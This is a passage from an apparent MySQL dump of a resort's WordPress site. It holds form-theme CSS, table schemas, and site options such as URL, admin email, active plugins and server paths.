left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: \"\";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #006C14 ;\r\nbackground: -moz-linear-gradient(left, #006C14 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006C14 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006C14 ), color-stop(20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 ), color-stop(80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006C14 ));\r\nbackground: -webkit-linear-gradient(left, #006C14 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006C14 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -o-linear-gradient(left, #006C14 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006C14 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: -ms-linear-gradient(left, #006C14 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006C14 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to right, #006C14 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #018819 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006C14 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #0DBB2C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #006C14;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D8E5DB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #006C14;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #006312 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #006312 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #047519 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #057C1C 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069140 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #006312 ), color-stop(20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #047519 ), color-stop(80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #057C1C ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069140 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #006312 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #047519 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #057C1C 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069140 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #006312 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #047519 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #057C1C 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069140 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #006312 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #047519 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #057C1C 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069140 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\nbackground: linear-gradient(to right, #006312 1{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #047519 20{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #057C1C 80{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069140 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ninput[type=\"password\"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #006C14;\r\n	cursor: pointer;\r\n	background-color: #7FB589;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #006C14;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #008118 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #008118 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #089723 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069C22 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #008118 ), color-stop(67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #089723 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069C22 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #008118 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #089723 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069C22 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #008118 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #089723 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069C22 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #008118 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #089723 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069C22 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\nbackground: linear-gradient(to right, #008118 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #089723 67{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #069C22 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FB589;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #069B22;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #e4e4e4), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #cccccc 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0);
/*!40000 ALTER TABLE `ar_contactformmaker_themes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_contactformmaker_views`
--

DROP TABLE IF EXISTS `ar_contactformmaker_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_contactformmaker_views` (
  `form_id` int(11) NOT NULL,
  `views` int(50) NOT NULL,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_contactformmaker_views`
--

LOCK TABLES `ar_contactformmaker_views` WRITE;
/*!40000 ALTER TABLE `ar_contactformmaker_views` DISABLE KEYS */;
INSERT INTO `ar_contactformmaker_views` VALUES (10,2697);
/*!40000 ALTER TABLE `ar_contactformmaker_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_links`
--

DROP TABLE IF EXISTS `ar_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_links`
--

LOCK TABLES `ar_links` WRITE;
/*!40000 ALTER TABLE `ar_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_options`
--

DROP TABLE IF EXISTS `ar_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=62304 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_options`
--

LOCK TABLES `ar_options` WRITE;
/*!40000 ALTER TABLE `ar_options` DISABLE KEYS */;
INSERT INTO `ar_options` VALUES (1,'siteurl','https://ashbyresort.com','yes'),(2,'home','https://ashbyresort.com','yes'),(3,'blogname','Ashby Resort and Campground','yes'),(4,'blogdescription','On Pelican Lake in Minnesota','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','dbc@expcom.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(29,'hack_file','0','yes'),(30,'blog_charset','UTF-8','yes'),(31,'moderation_keys','','no'),(32,'active_plugins','a:20:{i:0;s:70:\"addon-elements-for-elementor-page-builder/elementor-addon-elements.php\";i:1;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:2;s:37:\"booking-calendar/booking_calendar.php\";i:3;s:25:\"booking/wpdev-booking.php\";i:4;s:53:\"child-theme-configurator/child-theme-configurator.php\";i:5;s:33:\"classic-editor/classic-editor.php\";i:6;s:39:\"devices-elementor/elementor-devices.php\";i:7;s:32:\"duplicate-page/duplicatepage.php\";i:8;s:23:\"elementor/elementor.php\";i:9;s:23:\"ml-slider/ml-slider.php\";i:10;s:33:\"press-elements/press-elements.php\";i:11;s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";i:12;s:39:\"siteorigin-panels/siteorigin-panels.php\";i:13;s:39:\"so-widgets-bundle/so-widgets-bundle.php\";i:14;s:57:\"ssl-insecure-content-fixer/ssl-insecure-content-fixer.php\";i:15;s:25:\"tablepress/tablepress.php\";i:16;s:27:\"updraftplus/updraftplus.php\";i:18;s:23:\"wordfence/wordfence.php\";i:19;s:24:\"wordpress-seo/wp-seo.php\";i:20;s:24:\"wpforms-lite/wpforms.php\";}','yes'),(33,'category_base','','yes'),(34,'ping_sites','http://rpc.pingomatic.com/','yes'),(35,'comment_max_links','2','yes'),(36,'gmt_offset','','yes'),(37,'default_email_category','1','yes'),(38,'recently_edited','a:3:{i:0;s:87:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/themes/vantage-child/style.css\";i:2;s:118:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/plugins/child-theme-configurator/child-theme-configurator.php\";i:3;s:0:\"\";}','no'),(39,'template','vantage','yes'),(40,'stylesheet','vantage-child','yes'),(43,'comment_registration','0','yes'),(44,'html_type','text/html','yes'),(45,'use_trackback','0','yes'),(46,'default_role','subscriber','yes'),(47,'db_version','48748','yes'),(48,'uploads_use_yearmonth_folders','1','yes'),(49,'upload_path','','yes'),(50,'blog_public','1','yes'),(51,'default_link_category','2','yes'),(52,'show_on_front','page','yes'),(53,'tag_base','','yes'),(54,'show_avatars','1','yes'),(55,'avatar_rating','G','yes'),(56,'upload_url_path','','yes'),(57,'thumbnail_size_w','150','ye